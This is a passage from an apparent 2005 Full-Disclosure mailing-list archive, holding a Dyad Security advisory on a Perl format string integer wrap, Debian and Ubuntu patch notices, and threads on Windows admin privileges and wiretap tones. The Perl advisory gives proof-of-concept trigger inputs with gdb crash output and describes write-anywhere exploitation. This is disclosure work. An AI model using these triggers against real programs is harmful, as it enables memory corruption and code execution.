Vision-X. :) > > > > > > WildCAT BBS Anyone???? :) > > > > I remember playing tradewars and calling who knows where to get new text > > files :) > > > > Used Tone-loC a lot more back then :) > > > > JP > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > From advisory at dyadsecurity.com Thu Dec 1 09:03:47 2005 From: advisory at dyadsecurity.com (advisory at dyadsecurity.com) Date: Thu, 1 Dec 2005 01:03:47 -0800 Subject: [Full-disclosure] Perl format string integer wrap vulnerability Message-ID: <20051201090347.GH28337@5002.rapturesecurity.org> SUMMARY. perl suffers from an integer wrap overflow inside the explicit parameter format string functionality, this has been confirmed to be a vector for remote code execution. Date Found: September 23, 2005. Public Release: TBD. Application: perl Credit: Jack Louis of Dyad Security BACKGROUND. perl is a cross-platform scripting language. for more details see Perl.org DESCRIPTION. Value over INT_MAX(value of I) inside explicit parameter format string (%I$n) causes integer wrap in the efix (32bit signed integer) variable inside the function Perl_sv_vcatpvfn (see example 1) (sv.c:~9360). Allowing for a write value anywhere in memory exploitation vector (see example 2). Further, heap corruption itself is possible (see example 3), as are more exotic non-reliable $PC redirection (see example 4). From what we have seen the first exploitation method is the only valid one. ImmunitySec has found a generic method of controlling the first condition with a good amount of robustness and success. Perl itself is not directly vulnerable to remote attacks due to this flaw, however any perl program with format string vulnerabilities is. The vulnerability is not to limited DoS (as reported previously) but remote code execution as well as information leakage and DoS. IMPACT. Perl itself is not generally impacted by this vulnerability, but programs with format string vulnerabilities (Dyad Security has confirmed that several programs available at this time have this specific issue) can be vulnerable to remote code execution. Information about creating a robust generic exploit is forthcoming, so public knowledge of exploitation methods for this issue is in the cards. AFFECTED VERSIONS. Perl 5.9.2 and perl 5.8.6 have been tested and found to be vulnerable on linux, freebsd, dragonflybsd on the ia32 platform. It is assumed that a much larger range of software and platforms are also affected, as the sv.c seems to remain seemingly static over time, however this is not confirmed. EXAMPLE 1. $ gdb myperl/bin/perl5.8.7 GNU gdb 6.3 Copyright 2004 Free Software Foundation, Inc. GDB is free software, covered by the GNU General Public License, and you are welcome to change it and/or distribute copies of it under certain conditions. Type "show copying" to see the conditions. There is absolutely no warranty for GDB. Type "show warranty" for details. This GDB was configured as "i686-pc-linux-gnu"...Using host libthread_db library "/lib/tls/libthread_db.so.1". (gdb) break sv.c:9232 Breakpoint 1 at 0x80c0df0: file sv.c, line 9232. (gdb) set args -e 'printf("%2147483647\$n");' (gdb) run Breakpoint 1, Perl_sv_vcatpvfn (sv=0x812d180, pat=0x0, patlen=0, args=0x0, svargs=0x8133080, svmax=0, maybe_tainted=0xbffb72cb "") at sv.c:9232 9232 in sv.c (gdb) p efix $1 = 2147483647 (gdb) set args -e 'printf("%2147483648\$n");' (gdb) run Breakpoint 1, Perl_sv_vcatpvfn (sv=0x812d180, pat=0x80000000
, patlen=0, args=0x0, svargs=0x8133080, svmax=0, maybe_tainted=0xbfb0640b "") at sv.c:9232 9232 in sv.c (gdb) p efix $2 = -2147483648 (gdb) cont Modification of a read-only value attempted at -e line 1. Program exited with code 0377. (gdb) set args -e 'printf("%2147483649\$n");' (gdb) run Breakpoint 1, Perl_sv_vcatpvfn (sv=0x812d180, pat=0x80000001
, patlen=0, args=0x0, svargs=0x8133080, svmax=0, maybe_tainted=0xbfe69b9b "") at sv.c:9232 9232 in sv.c (gdb) p efix $3 = -2147483647 (gdb) cont Program received signal SIGSEGV, Segmentation fault. Perl_sv_setiv (sv=0x0, i=0) at sv.c:1652 1652 in sv.c (gdb) bt #0 Perl_sv_setiv (sv=0x0, i=0) at sv.c:1652 #1 0x080b6349 in Perl_sv_setuv_mg (sv=0x0, u=0) at sv.c:1743 #2 0x080c0e06 in Perl_sv_vcatpvfn (sv=0x812d180, pat=0x80000001
, patlen=0, args=0x0, svargs=0x8133080, svmax=0, maybe_tainted=0xbfe69b9b "") at sv.c:9232 #3 0x080e923b in Perl_do_sprintf (sv=0x812d180, len=1, sarg=0x813307c) at doop.c:713 #4 0x080de48a in Perl_pp_prtf () at pp_sys.c:1489 #5 0x080ad038 in Perl_runops_standard () at run.c:37 #6 0x080615c7 in S_run_body (oldscope=1) at perl.c:2000 #7 0x080613ff in perl_run (my_perl=0x812d008) at perl.c:1919 #8 0x0805e61f in main (argc=3, argv=0xbfe69da4, env=0xbfe69db4) at perlmain.c:98 (gdb) x/i $eip 0x80b61a8 : mov 0x8(%ebx),%edx (gdb) i r ebx edx ebx 0x0 0 edx 0x812d180 135451008 (gdb) EXAMPLE 2. #0 Perl_sv_setiv (sv=0x815f821, i=0) at sv.c:2184 2184 SvIVX(sv) = i; (gdb) x/i $eip 0x80c815c : mov %esi,0xc(%eax) EXAMPLE 3. #0 0xb7e69fb0 in malloc_consolidate () from /lib/tls/libc.so.6 EXAMPLE 4. #0 0x09010e50 in ?? () FIXES. Due to the information that has already been leaked we moved up the release date of this advisory. There is no official fix for this issue as of yet. We have provided a sample patch for the 5.9.2 version. See http://www.dyadsecurity.com/perl-0002.html for additional information and a link to the patch. SPECIAL THANKS. Special thanks to Dave Aitel and Bas Alberts of ImmunitySec for the donation of resources and leading the difficult phase of exploit verification research. If you wish to obtain any exploits or further detailed information regarding this vulnerability, please contact ImmunitySec. LEGAL NOTICES. Copyright (C) 2005 Dyad Security, Inc. Permission is granted for the redistribution of this alert electronically. It may not be edited in any way without the express written consent of Dyad Security, Inc. If you wish to reprint the whole or any part of this alert in any other medium other than electronically, please email advisoryreprint at dyadsecurity.com for permission. DISCLAIMER. The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There are no warranties with regard to this information. Neither the author nor the publisher accepts any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information. SEE ALSO. http://www.dyadsecurity.com/webmin-0001.html From raoul at elforsoft.com Thu Dec 1 09:29:36 2005 From: raoul at elforsoft.com (Raoul Nakhmanson-Kulish (en)) Date: Thu, 01 Dec 2005 12:29:36 +0300 Subject: [Full-disclosure] Support_388945a0 account in Win XP/2003 In-Reply-To: <438EB3EB.8030402@gmail.com> References: <438E9EEE.9070301@elforsoft.com> <438EB3EB.8030402@gmail.com> Message-ID: <438EC280.90803@elforsoft.com> Hello, James Tucker! On 01.12.2005 11:27 you wrote: > Someone is actually spreading rumors of a service being abused that > isn't even listening at the time? > > RA requires the RA server to be launched. > > Don't leave un-closed tickets or RA support connection scripts hanging > around. Of course :) but the habit to shut unnecessary gaps and cut unnecessary ends is not the worst of habits. -- Regards, Raoul Nakhmanson-Kulish, Elfor Soft Ltd., IT Department From joey at infodrom.org Thu Dec 1 09:30:45 2005 From: joey at infodrom.org (Martin Schulze) Date: Thu, 1 Dec 2005 10:30:45 +0100 (CET) Subject: [Full-disclosure] [SECURITY] [DSA 914-1] New horde2 packages fix cross-site scripting Message-ID: -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 - -------------------------------------------------------------------------- Debian Security Advisory DSA 914-1 security at debian.org http://www.debian.org/security/ Martin Schulze December 1st, 2005 http://www.debian.org/security/faq - -------------------------------------------------------------------------- Package : horde2 Vulnerability : missing input sanitising Problem type : remote Debian-specific: no CVE ID : CVE-2005-3570 BugTraq ID : 15409 Debian Bug : 338983 A vulnerability has been discovered in horde2, a web application suite, that allows attackers to insert arbitary script code into the error web page. The old stable distribution (woody) does not contain horde2 packages. For the stable distribution (sarge) this problem has been fixed in version 2.2.8-1sarge1. For the unstable distribution (sid) this problem has been fixed in version 2.2.9-1. We recommend that you upgrade your horde2 package. Upgrade Instructions - -------------------- wget url will fetch the file for you dpkg -i file.deb will install the referenced file. If you are using the apt-get package manager, use the line for sources.list as given below: apt-get update will update the internal database apt-get upgrade will install corrected packages You may use an automated update by adding the resources from the footer to the proper configuration. Debian GNU/Linux 3.1 alias sarge - -------------------------------- Source archives: http://security.debian.org/pool/updates/main/h/horde2/horde2_2.2.8-1sarge1.dsc Size/MD5 checksum: 575 fc3d76af255dd93e839ed24cf7c3ba84 http://security.debian.org/pool/updates/main/h/horde2/horde2_2.2.8-1sarge1.diff.gz Size/MD5 checksum: 38308 d87c50a15c7133ba4ca29d99c77d5da1 http://security.debian.org/pool/updates/main/h/horde2/horde2_2.2.8.orig.tar.gz Size/MD5 checksum: 683005 89961af4e4488a908147d7b3a0dc3b44 Architecture independent components: http://security.debian.org/pool/updates/main/h/horde2/horde2_2.2.8-1sarge1_all.deb Size/MD5 checksum: 721182 761d84ac7f89eef150fa21c8b0c79541 These files will probably be moved into the stable distribution on its next update. - --------------------------------------------------------------------------------- For apt-get: deb http://security.debian.org/ stable/updates main For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main Mailing list: debian-security-announce at lists.debian.org Package info: `apt-cache show ' and http://packages.debian.org/ -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.2 (GNU/Linux) iD8DBQFDjsLFW5ql+IAeqTIRArczAJ9xrGplMhujM0krR4rgEkOda/8IIgCghoAY vCeMSRKp4CS5d/bdWLvL+No= =ZF1J -----END PGP SIGNATURE----- From unknown.pentester at gmail.com Thu Dec 1 10:18:51 2005 From: unknown.pentester at gmail.com (pagvac) Date: Thu, 1 Dec 2005 10:18:51 +0000 Subject: [Full-disclosure] Re: Google Talk cleartext credentials in processmemory In-Reply-To: <438C8635.2050501@messagelabs.com> References: <438C8635.2050501@messagelabs.com> Message-ID: On 11/29/05, Andrew Simmons wrote: > pagvac wrote: > > > Again, my testing is based on today's reality which is that most > > Windows users use administrative accounts for regular tasks such as > > web browsing and using their email clients. > > > er, not really. Home users, perhaps, but there are a lot more WIndows > machines in corp environments than at home. Even in corp environments you still see some users running admin privileges. Yes, I agree, it doesn't happen as often as in home environments, but it *does* happen. Anyways, I don't have any statistics so I'm not going to argue this, but if you talk to any company that offers pentesting services they will surely tell you that they come across companies that gives admin privileges to some of their employees in their Windows desktops (I'm referring to employees that are *not* network administrators). This is just for convenience so they can install whatever applications they need. It'd be interesting to find some online survey on what percentage of business and home users use admin privileges for daily tasks. If you look at Windows 2000/XP, it does it wrong from the very beginning: the user is asked to add a user account from installation. This account has admin privileges by default. Even worse, at that point there is another default admin account ("administrator") on the system, so by the time you're done installing your copy of Windows there is two admin accounts on your system. Wouldn't it make more sense that the second user account which is created during installation has restricted privileges by default? Maybe Windows XP could add one of those stupid balloons saying something like "Problem installing an application? Now you can right-click on the file and click on "run as" to install your software with admin privileges..." Well, these are just some ideas, of course I'm no authority nor guru, I'm just a guy who enjoys learning. > > \a > > -- > Andrew Simmons > Technical Security Consultant > MessageLabs > > Mobile: +44 (7917) 178745 > asimmons at messagelabs.com > www.messagelabs.com > > MessageLabs - Be certain > > ______________________________________________________________________ > This email has been scanned by the MessageLabs Email Security System. > For more information please visit http://www.messagelabs.com/email > ______________________________________________________________________ > -- pagvac (Adrian Pastor) www.ikwt.com - In Knowledge We Trust From andrew2005 at ledge.co.za Thu Dec 1 10:38:39 2005 From: andrew2005 at ledge.co.za (Andrew McGill) Date: Thu, 1 Dec 2005 12:38:39 +0200 (SAST) Subject: [Full-disclosure] Clever crooks can foil wiretaps, security flaw in tap technology In-Reply-To: <4ef5fec60511301048m11a15973v386c4ce266aee202@mail.gmail.com> References: <4ef5fec60511301048m11a15973v386c4ce266aee202@mail.gmail.com> Message-ID: coderman wrote, > heheheh > > http://seattlepi.nwsource.com/national/250215_wiretap30.html //snip > The tone, also known as a C-tone, sounds like a low buzzing and > is "slightly annoying," Obtaining a snooping order based on the fact that this C-tone was detected should be easy. Did you know that escaped prisoners in bright orange outfits are difficult to spot in public? &:-) -- Disclaimer: by reading this disclaimer, you agree not to read it again. From colweb at gmail.com Thu Dec 1 11:06:13 2005 From: colweb at gmail.com (Colin) Date: Thu, 1 Dec 2005 11:06:13 +0000 Subject: [Full-disclosure] Re: Google Talk cleartext credentials in processmemory In-Reply-To: References: <438C8635.2050501@messagelabs.com> Message-ID: <1bde4ec50512010306u1c9a2cbdv@mail.gmail.com> On 01/12/05, pagvac wrote: > Even in corp environments you still see some users running admin > privileges. Yes, I agree, it doesn't happen as often as in home > environments, but it *does* happen. Our corporate environment is almost completely full of administrators. The EMEA region is tighter, but ASIAPAC and AMERICAS regions and basically 100% admins. Management dont see the point "if the machine can just be re-imaged".... god save us. Mind you our EMEA region everyone is a "Power User" which as most will know can get Admin rights in about 1 minute. More worrying was the Domain Admins logging onto their PCs every day with those privs.. omg From roland_ruf at gmx.de Thu Dec 1 12:10:31 2005 From: roland_ruf at gmx.de (Roland Ruf) Date: Thu, 1 Dec 2005 13:10:31 +0100 Subject: AW: [Full-disclosure] Clever crooks can foil wiretaps, security flawin tap technology In-Reply-To: Message-ID: <003501c5f670$3b8f1510$0b00a8c0@mainpc> Cool stuff.. *lol* I do not think, that the FBI is still using this old analogue recorders in Total recording mode connected to the analogue extensions... That may have worked 10 or 15 years ago depending on many things like the connection type, the way the recorder detects the signal, etc, but I assume only some single manufactures could have that problem... If you record extension site on analogue extensions and you use the line sense as recording trigger (which is default on many recorders), that thing with the CTONE would not have worked... And we do not talk about the digital lines, where the recording trigger is normally absolutely independent from the audio of that call. Regards Roland coderman wrote, > heheheh > > http://seattlepi.nwsource.com/national/250215_wiretap30.html //snip > The tone, also known as a C-tone, sounds like a low buzzing and > is "slightly annoying," Obtaining a snooping order based on the fact that this C-tone was detected should be easy. Did you know that escaped prisoners in bright orange outfits are difficult to spot in public? &:-) -- Disclaimer: by reading this disclaimer, you agree not to read it again. _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ From martin.pitt at canonical.com Thu Dec 1 12:37:30 2005 From: martin.pitt at canonical.com (Martin Pitt) Date: Thu, 1 Dec 2005 13:37:30 +0100 Subject: [Full-disclosure] [USN-220-1] w3c-libwww vulnerability Message-ID: <20051201123730.GR7527@piware.de> =========================================================== Ubuntu Security Notice USN-220-1 December 01, 2005 w3c-libwww vulnerability CVE-2005-3183 =========================================================== A security issue affects the following Ubuntu releases: Ubuntu 4.10 (Warty Warthog) Ubuntu 5.04 (Hoary Hedgehog) Ubuntu 5.10 (Breezy Badger) The following packages are affected: libwww0 The problem can be corrected by upgrading the affected package to version 5.4.0-9ubuntu0.4.10 (for Ubuntu 4.10), 5.4.0-9ubuntu0.5.04 (for Ubuntu 5.04), or 5.4.0-9ubuntu0.5.10 (for Ubuntu 5.10). In general, a standard system upgrade is sufficient to effect the necessary changes. Details follow: Sam Varshavchik discovered several buffer overflows in the HTBoundary_put_block() function. By sending specially crafted HTTP multipart/byteranges MIME messages, a malicious HTTP server could trigger an out of bounds memory access in the libwww library, which causes the program that uses the library to crash. Updated packages for Ubuntu 4.10: Source archives: http://security.ubuntu.com/ubuntu/pool/main/w/w3c-libwww/w3c-libwww_5.4.0-9ubuntu0.4.10.diff.gz Size/MD5: 510355 15f9592db51864e0e060fe1f3a6f63f6 http://security.ubuntu.com/ubuntu/pool/main/w/w3c-libwww/w3c-libwww_5.4.0-9ubuntu0.4.10.dsc Size/MD5: 714 637bf331ecefe995ae2ef4b280e2bc2b http://security.ubuntu.com/ubuntu/pool/main/w/w3c-libwww/w3c-libwww_5.4.0.orig.tar.gz Size/MD5: 1127018 a6073cda765b7f9fa0970eb92757f6bb amd64 architecture (Athlon64, Opteron, EM64T Xeon) http://security.ubuntu.com/ubuntu/pool/main/w/w3c-libwww/libwww-dev_5.4.0-9ubuntu0.4.10_amd64.deb Size/MD5: 684660 313c59ca507046ff8a2b66ac49d0ac7e http://security.ubuntu.com/ubuntu/pool/main/w/w3c-libwww/libwww-ssl-dev_5.4.0-9ubuntu0.4.10_amd64.deb Size/MD5: 692530 d06eb91e03a400e23ae94d8466965bc5 http://security.ubuntu.com/ubuntu/pool/main/w/w3c-libwww/libwww-ssl0_5.4.0-9ubuntu0.4.10_amd64.deb Size/MD5: 512118 2646446086e15f870cc8930d39fa65ad http://security.ubuntu.com/ubuntu/pool/universe/w/w3c-libwww/libwww0_5.4.0-9ubuntu0.4.10_amd64.deb Size/MD5: 503738 7dffb1bfe8e5215be6840aa9a8f2d2c9 i386 architecture (x86 compatible Intel/AMD) http://security.ubuntu.com/ubuntu/pool/main/w/w3c-libwww/libwww-dev_5.4.0-9ubuntu0.4.10_i386.deb Size/MD5: 607840 b16565a4a8dfaa8a5b10227f73d0ca5d http://security.ubuntu.com/ubuntu/pool/main/w/w3c-libwww/libwww-ssl-dev_5.4.0-9ubuntu0.4.10_i386.deb Size/MD5: 614156 01705c593f044c6ef920c3799b8a7cb7 http://security.ubuntu.com/ubuntu/pool/main/w/w3c-libwww/libwww-ssl0_5.4.0-9ubuntu0.4.10_i386.deb Size/MD5: 452774 21fe2a50e533a6be012c07ca2e1bca33 http://security.ubuntu.com/ubuntu/pool/universe/w/w3c-libwww/libwww0_5.4.0-9ubuntu0.4.10_i386.deb Size/MD5: 444552 098a59839be744797f2c8f9df0fc70ba powerpc architecture (Apple Macintosh G3/G4/G5) http://security.ubuntu.com/ubuntu/pool/main/w/w3c-libwww/libwww-dev_5.4.0-9ubuntu0.4.10_powerpc.deb Size/MD5: 694934 c4b38eaec0fbff44f0b92e6b8d4c646f http://security.ubuntu.com/ubuntu/pool/main/w/w3c-libwww/libwww-ssl-dev_5.4.0-9ubuntu0.4.10_powerpc.deb Size/MD5: 704214 98db309dd1b252e6fe1fc7ec3f5e342c http://security.ubuntu.com/ubuntu/pool/main/w/w3c-libwww/libwww-ssl0_5.4.0-9ubuntu0.4.10_powerpc.deb Size/MD5: 507282 96d5f4382a0df15df9a04b72f33350f5 http://security.ubuntu.com/ubuntu/pool/universe/w/w3c-libwww/libwww0_5.4.0-9ubuntu0.4.10_powerpc.deb Size/MD5: 498518 f77c5c60228ec7f769281ca4ba690ac1 Updated packages for Ubuntu 5.04: Source archives: http://security.ubuntu.com/ubuntu/pool/main/w/w3c-libwww/w3c-libwww_5.4.0-9ubuntu0.5.04.diff.gz Size/MD5: 510353 dfacb49b7bc30b6829a064ed857bad36 http://security.ubuntu.com/ubuntu/pool/main/w/w3c-libwww/w3c-libwww_5.4.0-9ubuntu0.5.04.dsc Size/MD5: 714 6b2128a3be183cbb204645423fa4fb22 http://security.ubuntu.com/ubuntu/pool/main/w/w3c-libwww/w3c-libwww_5.4.0.orig.tar.gz Size/MD5: 1127018 a6073cda765b7f9fa0970eb92757f6bb amd64 architecture (Athlon64, Opteron, EM64T Xeon) http://security.ubuntu.com/ubuntu/pool/main/w/w3c-libwww/libwww-dev_5.4.0-9ubuntu0.5.04_amd64.deb Size/MD5: 684646 774b5e3bb24748468fb4417119648b1b http://security.ubuntu.com/ubuntu/pool/main/w/w3c-libwww/libwww-ssl-dev_5.4.0-9ubuntu0.5.04_amd64.deb Size/MD5: 692468 bc282e4fc92517bea58d67f8682f4793 http://security.ubuntu.com/ubuntu/pool/main/w/w3c-libwww/libwww-ssl0_5.4.0-9ubuntu0.5.04_amd64.deb Size/MD5: 512176 17bce1afc105e18c7d0a87a2bd1c0e35 http://security.ubuntu.com/ubuntu/pool/universe/w/w3c-libwww/libwww0_5.4.0-9ubuntu0.5.04_amd64.deb Size/MD5: 503836 229e14f16890a3698b7a6c0f643c3a07 i386 architecture (x86 compatible Intel/AMD) http://security.ubuntu.com/ubuntu/pool/main/w/w3c-libwww/libwww-dev_5.4.0-9ubuntu0.5.04_i386.deb Size/MD5: 607932 f8d90cd4c1c414fd3be1445452b0f9dc http://security.ubuntu.com/ubuntu/pool/main/w/w3c-libwww/libwww-ssl-dev_5.4.0-9ubuntu0.5.04_i386.deb Size/MD5: 614278 7c49d8fb328a1615fbf68df3e31e8874 http://security.ubuntu.com/ubuntu/pool/main/w/w3c-libwww/libwww-ssl0_5.4.0-9ubuntu0.5.04_i386.deb Size/MD5: 452130 8869e99df88b832629d392fb09bd4943 http://security.ubuntu.com/ubuntu/pool/universe/w/w3c-libwww/libwww0_5.4.0-9ubuntu0.5.04_i386.deb Size/MD5: 443922 8fe4ee3f786484817a18269ff5b1bb00 powerpc architecture (Apple Macintosh G3/G4/G5) http://security.ubuntu.com/ubuntu/pool/main/w/w3c-libwww/libwww-dev_5.4.0-9ubuntu0.5.04_powerpc.deb Size/MD5: 694902 9adb92ce0d06b187804ea4ef3b9b98e0 http://security.ubuntu.com/ubuntu/pool/main/w/w3c-libwww/libwww-ssl-dev_5.4.0-9ubuntu0.5.04_powerpc.deb Size/MD5: 704190 4ede635cd936116304be4938db47c206 http://security.ubuntu.com/ubuntu/pool/main/w/w3c-libwww/libwww-ssl0_5.4.0-9ubuntu0.5.04_powerpc.deb Size/MD5: 507868 cd6be292a8642f6ba829f20c0d477dcd http://security.ubuntu.com/ubuntu/pool/universe/w/w3c-libwww/libwww0_5.4.0-9ubuntu0.5.04_powerpc.deb Size/MD5: 498974 d12c45e22e60c084bfe6245884a3c911 Updated packages for Ubuntu 5.10: Source archives: http://security.ubuntu.com/ubuntu/pool/main/w/w3c-libwww/w3c-libwww_5.4.0-9ubuntu0.5.10.diff.gz Size/MD5: 510354 66df7306af726ce9ca9c09e02f773fab http://security.ubuntu.com/ubuntu/pool/main/w/w3c-libwww/w3c-libwww_5.4.0-9ubuntu0.5.10.dsc Size/MD5: 714 e4c57b709f40d8ecb2d58ea37550b78e http://security.ubuntu.com/ubuntu/pool/main/w/w3c-libwww/w3c-libwww_5.4.0.orig.tar.gz Size/MD5: 1127018 a6073cda765b7f9fa0970eb92757f6bb amd64 architecture (Athlon64, Opteron, EM64T Xeon) http://security.ubuntu.com/ubuntu/pool/main/w/w3c-libwww/libwww-dev_5.4.0-9ubuntu0.5.10_amd64.deb Size/MD5: 692584 1cdf973add1144853304890300a381de http://security.ubuntu.com/ubuntu/pool/main/w/w3c-libwww/libwww-ssl-dev_5.4.0-9ubuntu0.5.10_amd64.deb Size/MD5: 700096 09ce0c2f9e3cf3f8b0a1a79d38379c18 http://security.ubuntu.com/ubuntu/pool/main/w/w3c-libwww/libwww-ssl0_5.4.0-9ubuntu0.5.10_amd64.deb Size/MD5: 520120 b16e4d23b9503b41468d9a8862347b2e http://security.ubuntu.com/ubuntu/pool/universe/w/w3c-libwww/libwww0_5.4.0-9ubuntu0.5.10_amd64.deb Size/MD5: 511492 11b9667628eb7fcaaec93b53d50a1881 i386 architecture (x86 compatible Intel/AMD) http://security.ubuntu.com/ubuntu/pool/main/w/w3c-libwww/libwww-dev_5.4.0-9ubuntu0.5.10_i386.deb Size/MD5: 608218 6702f91d61eb03f7aa76ddecc68e0723 http://security.ubuntu.com/ubuntu/pool/main/w/w3c-libwww/libwww-ssl-dev_5.4.0-9ubuntu0.5.10_i386.deb Size/MD5: 614374 f057682a4109808438162afe09ca5376 http://security.ubuntu.com/ubuntu/pool/main/w/w3c-libwww/libwww-ssl0_5.4.0-9ubuntu0.5.10_i386.deb Size/MD5: 448164 4e09a8140ee0519a6b4512a442effff7 http://security.ubuntu.com/ubuntu/pool/universe/w/w3c-libwww/libwww0_5.4.0-9ubuntu0.5.10_i386.deb Size/MD5: 441186 33bafbd9b12a56ed2633f3e7a7619e2a powerpc architecture (Apple Macintosh G3/G4/G5) http://security.ubuntu.com/ubuntu/pool/main/w/w3c-libwww/libwww-dev_5.4.0-9ubuntu0.5.10_powerpc.deb Size/MD5: 698766 8ecc3202704293dea4fc9555d7ffc0f1 http://security.ubuntu.com/ubuntu/pool/main/w/w3c-libwww/libwww-ssl-dev_5.4.0-9ubuntu0.5.10_powerpc.deb Size/MD5: 707580 469d6a312828982ce40a5aeb931f24fd http://security.ubuntu.com/ubuntu/pool/main/w/w3c-libwww/libwww-ssl0_5.4.0-9ubuntu0.5.10_powerpc.deb Size/MD5: 510528 b9fda83cd926e9d926ef5ff16b474487 http://security.ubuntu.com/ubuntu/pool/universe/w/w3c-libwww/libwww0_5.4.0-9ubuntu0.5.10_powerpc.deb Size/MD5: 501542 7e17ff5ee5861d8e7eb2d6fe7e780ec9 -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: application/pgp-signature Size: 189 bytes Desc: Digital signature Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20051201/8fef2c9b/attachment.bin From martin.pitt at canonical.com Thu Dec 1 12:41:25 2005 From: martin.pitt at canonical.com (Martin Pitt) Date: Thu, 1 Dec 2005 13:41:25 +0100 Subject: [Full-disclosure] [USN-221-1] racoon vulnerability Message-ID: <20051201124125.GS7527@piware.de> =========================================================== Ubuntu Security Notice USN-221-1 December 01, 2005 ipsec-tools vulnerability CVE-2005-3732 =========================================================== A security issue affects the following Ubuntu releases: Ubuntu 4.10 (Warty Warthog) Ubuntu 5.04 (Hoary Hedgehog) Ubuntu 5.10 (Breezy Badger) The following packages are affected: racoon The problem can be corrected by upgrading the affected package to version 0.3.3-1ubuntu0.2 (for Ubuntu 4.10), 1:0.5-5ubuntu0.1 (for Ubuntu 5.04), or 1:0.6-1ubuntu1.1 (for Ubuntu 5.10). In general, a standard system upgrade is sufficient to effect the necessary changes. Details follow: The Oulu University Secure Programming Group discovered a remote Denial of Service vulnerability in the racoon daemon. When the daemon is configured to use aggressive mode, then it did not check whether the peer sent all required payloads during the IKE negotiation phase. A malicious IPsec peer could exploit this to crash the racoon daemon. Please be aware that racoon is not officially supported by Ubuntu, the package is in the 'universe' component of the archive. Updated packages for Ubuntu 4.10: Source archives: http://security.ubuntu.com/ubuntu/pool/main/i/ipsec-tools/ipsec-tools_0.3.3-1ubuntu0.2.diff.gz Size/MD5: 191462 3f68d0eb625f920ef3ab5e4e1a2b942f http://security.ubuntu.com/ubuntu/pool/main/i/ipsec-tools/ipsec-tools_0.3.3-1ubuntu0.2.dsc Size/MD5: 705 8c92ea1c2b68e7e335892c10020bafc2 http://security.ubuntu.com/ubuntu/pool/main/i/ipsec-tools/ipsec-tools_0.3.3.orig.tar.gz Size/MD5: 864122 b141da8ae299c8fdc53e536f6bbc3ad0 amd64 architecture (Athlon64, Opteron, EM64T Xeon) http://security.ubuntu.com/ubuntu/pool/main/i/ipsec-tools/ipsec-tools_0.3.3-1ubuntu0.2_amd64.deb Size/MD5: 106260 491ea714d329c5b0d6b8283c7579140f http://security.ubuntu.com/ubuntu/pool/universe/i/ipsec-tools/racoon_0.3.3-1ubuntu0.2_amd64.deb Size/MD5: 201510 7c3c1d31969a6924bfe0afbf6f56b468 i386 architecture (x86 compatible Intel/AMD) http://security.ubuntu.com/ubuntu/pool/main/i/ipsec-tools/ipsec-tools_0.3.3-1ubuntu0.2_i386.deb Size/MD5: 101224 5e35a5bfca069cf88d0d349ad86b3cf8 http://security.ubuntu.com/ubuntu/pool/universe/i/ipsec-tools/racoon_0.3.3-1ubuntu0.2_i386.deb Size/MD5: 186400 0627a043d0f0ad1e05830d57c35666f2 powerpc architecture (Apple Macintosh G3/G4/G5) http://security.ubuntu.com/ubuntu/pool/main/i/ipsec-tools/ipsec-tools_0.3.3-1ubuntu0.2_powerpc.deb Size/MD5: 108966 67f208c020df5f1194ab71a0569004f2 http://security.ubuntu.com/ubuntu/pool/universe/i/ipsec-tools/racoon_0.3.3-1ubuntu0.2_powerpc.deb Size/MD5: 196078 2acd7c40b8a56db688fc8ac8484272da Updated packages for Ubuntu 5.04: Source archives: http://security.ubuntu.com/ubuntu/pool/main/i/ipsec-tools/ipsec-tools_0.5-5ubuntu0.1.diff.gz Size/MD5: 41200 47ee31ab5776589dd049a90f0437865b http://security.ubuntu.com/ubuntu/pool/main/i/ipsec-tools/ipsec-tools_0.5-5ubuntu0.1.dsc Size/MD5: 660 cad8e0faad2316aa0a65e28880548f58 http://security.ubuntu.com/ubuntu/pool/main/i/ipsec-tools/ipsec-tools_0.5.orig.tar.gz Size/MD5: 883484 57de611b23eb141173698478e9b64474 amd64 architecture (Athlon64, Opteron, EM64T Xeon) http://security.ubuntu.com/ubuntu/pool/main/i/ipsec-tools/ipsec-tools_0.5-5ubuntu0.1_amd64.deb Size/MD5: 80430 47b366f44e0c8fb49ea43500161a6419 http://security.ubuntu.com/ubuntu/pool/universe/i/ipsec-tools/racoon_0.5-5ubuntu0.1_amd64.deb Size/MD5: 301450 9fd3f818fc41641ed0e691f69b23c441 i386 architecture (x86 compatible Intel/AMD) http://security.ubuntu.com/ubuntu/pool/main/i/ipsec-tools/ipsec-tools_0.5-5ubuntu0.1_i386.deb Size/MD5: 75606 390fe7eb94e2e519bef1a0df6b6d46b5 http://security.ubuntu.com/ubuntu/pool/universe/i/ipsec-tools/racoon_0.5-5ubuntu0.1_i386.deb Size/MD5: 276974 baef582ea75ecaf240298d2917b79fac powerpc architecture (Apple Macintosh G3/G4/G5) http://security.ubuntu.com/ubuntu/pool/main/i/ipsec-tools/ipsec-tools_0.5-5ubuntu0.1_powerpc.deb Size/MD5: 83030 7880cae89438386a5b9f676760eff1be http://security.ubuntu.com/ubuntu/pool/universe/i/ipsec-tools/racoon_0.5-5ubuntu0.1_powerpc.deb Size/MD5: 296838 f417446dce53652608242e1798663622 Updated packages for Ubuntu 5.10: Source archives: http://security.ubuntu.com/ubuntu/pool/main/i/ipsec-tools/ipsec-tools_0.6-1ubuntu1.1.diff.gz Size/MD5: 49677 79084ce144e4b54267f69876d8104387 http://security.ubuntu.com/ubuntu/pool/main/i/ipsec-tools/ipsec-tools_0.6-1ubuntu1.1.dsc Size/MD5: 685 c22deb12d9a0943e3a66aad1a83c3857 http://security.ubuntu.com/ubuntu/pool/main/i/ipsec-tools/ipsec-tools_0.6.orig.tar.gz Size/MD5: 905983 2cd85d36012b4d2c6947f7c17ad45b3e amd64 architecture (Athlon64, Opteron, EM64T Xeon) 